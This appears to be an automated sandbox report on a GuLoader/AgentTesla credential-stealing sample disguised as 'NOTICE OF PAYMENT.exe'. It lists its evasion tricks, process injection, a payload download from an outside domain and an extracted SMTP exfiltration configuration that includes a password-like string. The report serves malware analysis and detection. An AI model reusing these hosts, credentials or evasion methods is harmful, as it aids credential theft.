Windows Analysis Report NOTICE OF PAYMENT.exe

Overview

General Information

Sample Name: NOTICE OF PAYMENT.exe
Analysis ID: 483899
MD5: 478e62ef90d2bcfa4add3b5ea1b39826
SHA1: 97000b21c84ef111d1795161e34f8b616fe78ebb
SHA256: 44a9a29d7cddbe89d5b983dd0286aaa532e785af356cc8d88b645deeb0251fed
Tags: exeguloaderagenttesla
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: RegAsm.exe.900.15.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}
Multi AV Scanner detection for submitted file
Source: NOTICE OF PAYMENT.exe Virustotal: Detection: 37% Perma Link
Source: NOTICE OF PAYMENT.exe ReversingLabs: Detection: 24%
Antivirus detection for URL or domain
Source: https://qrextechnologies.com/barrr09_rjFnAm147.bin Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: https://qrextechnologies.com/barrr09_rjFnAm147.bin Virustotal: Detection: 6% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: NOTICE OF PAYMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.4:49831 version: TLS 1.2

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /barrr09_rjFnAm147.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: RegAsm.exe, 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp String found in binary or memory: http://cthUYD.com
Source: RegAsm.exe, 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: qrextechnologies.com
Source: global traffic HTTP traffic detected: GET /barrr09_rjFnAm147.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.4:49831 version: TLS 1.2

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NOTICE OF PAYMENT.exe
Executable has a suspicious name (potential lure to open the executable)
Source: NOTICE OF PAYMENT.exe Static file information: Suspicious name
Uses 32bit PE files
Source: NOTICE OF PAYMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_00408F9F 0_2_00408F9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_1FE847A0 15_2_1FE847A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_1FE84790 15_2_1FE84790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_1FE84772 15_2_1FE84772
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: NOTICE OF PAYMENT.exe, 00000000.00000000.662763122.000000000041D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDopesheetnix5.exe vs NOTICE OF PAYMENT.exe
Source: NOTICE OF PAYMENT.exe Binary or memory string: OriginalFilenameDopesheetnix5.exe vs NOTICE OF PAYMENT.exe
PE file contains strange resources
Source: NOTICE OF PAYMENT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: NOTICE OF PAYMENT.exe Virustotal: Detection: 37%
Source: NOTICE OF PAYMENT.exe ReversingLabs: Detection: 24%
Source: NOTICE OF PAYMENT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe 'C:\Users\user\Desktop\NOTICE OF PAYMENT.exe'
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\NOTICE OF PAYMENT.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\NOTICE OF PAYMENT.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.1064174935.0000000002AB0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_00405E76 push ds; ret 0_2_00405E7A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_00407821 push ecx; retf 0_2_00407822
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_004062CE push es; ret 0_2_004062D3
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_00403D0D push edi; iretd 0_2_00403D13
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_00403B2F push esi; iretd 0_2_00403B64
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_00406FCC pushfd ; retf 0_2_00406FCD
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB44AB push edx; ret 0_2_02AB44BE
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB4A89 push ds; ret 0_2_02AB4AD9
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB1284 push edx; retf 0_2_02AB1282
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB2A9D push eax; iretd 0_2_02AB2AA4
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB4CE0 push ebx; ret 0_2_02AB4CE6
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB44D7 push edx; ret 0_2_02AB44BE
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB122A push edx; retf 0_2_02AB1282
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB4E26 push edx; ret 0_2_02AB4E4A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB2624 push esi; ret 0_2_02AB260A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB2C32 push ecx; iretd 0_2_02AB2C34
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB3436 push edx; ret 0_2_02AB343A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB560C push edx; retf 0_2_02AB5626
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB1A05 push edx; ret 0_2_02AB1A16
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB1019 push es; iretd 0_2_02AB10B8
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB3A7C push esp; iretd 0_2_02AB3A84
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB3A71 push edx; retf 0_2_02AB3A7A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB1874 push edx; ret 0_2_02AB187A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB25A8 push esi; ret 0_2_02AB260A
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB432E push edi; retf 0_2_02AB432F
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Code function: 0_2_02AB1B6D pushad ; iretd 0_2_02AB1B90
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: NOTICE OF PAYMENT.exe, 00000000.00000002.1064212636.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: NOTICE OF PAYMENT.exe, 00000000.00000002.1064212636.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe RDTSC instruction interceptor: First address: 000000000040BA3A second address: 000000000040BA3A instructions: 0x00000000 rdtsc 0x00000002 cmp bh, FFFFFFAEh 0x00000005 xor eax, edx 0x00000007 cmp edx, 000000D5h 0x0000000d dec edi 0x0000000e cmp esi, 000000AFh 0x00000014 movd xmm6, eax 0x00000018 jmp 00007F830CB02BA1h 0x0000001a cmp edi, 00000000h 0x0000001d jne 00007F830CB02AC0h 0x00000023 cmp eax, 0000009Fh 0x00000028 mov ebx, 8E39E371h 0x0000002d cmp di, 00ECh 0x00000032 xor ebx, 70C88D55h 0x00000038 cmp dx, 00FAh 0x0000003d xor ebx, 7E685535h 0x00000043 cmp si, 00FCh 0x00000048 wait 0x00000049 jmp 00007F830CB02B9Fh 0x0000004b add ebx, 7FA6C4EFh 0x00000051 cmp ecx, 000000F9h 0x00000057 cmp cl, FFFFFFBAh 0x0000005a rdtsc
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 496 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Window / User API: threadDelayed 895 Jump to behavior
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Window / User API: threadDelayed 9105 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 810 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 2013 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe System information queried: ModuleInformation Jump to behavior
Source: NOTICE OF PAYMENT.exe, 00000000.00000002.1064212636.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: NOTICE OF PAYMENT.exe, 00000000.00000002.1064212636.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E30000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NOTICE OF PAYMENT.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\NOTICE OF PAYMENT.exe' Jump to behavior
Source: RegAsm.exe, 0000000F.00000002.1188201679.0000000001710000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000F.00000002.1188201679.0000000001710000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000F.00000002.1188201679.0000000001710000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 0000000F.00000002.1188201679.0000000001710000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 900, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 900, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000F.00000002.1191356407.000000001DCD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 900, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
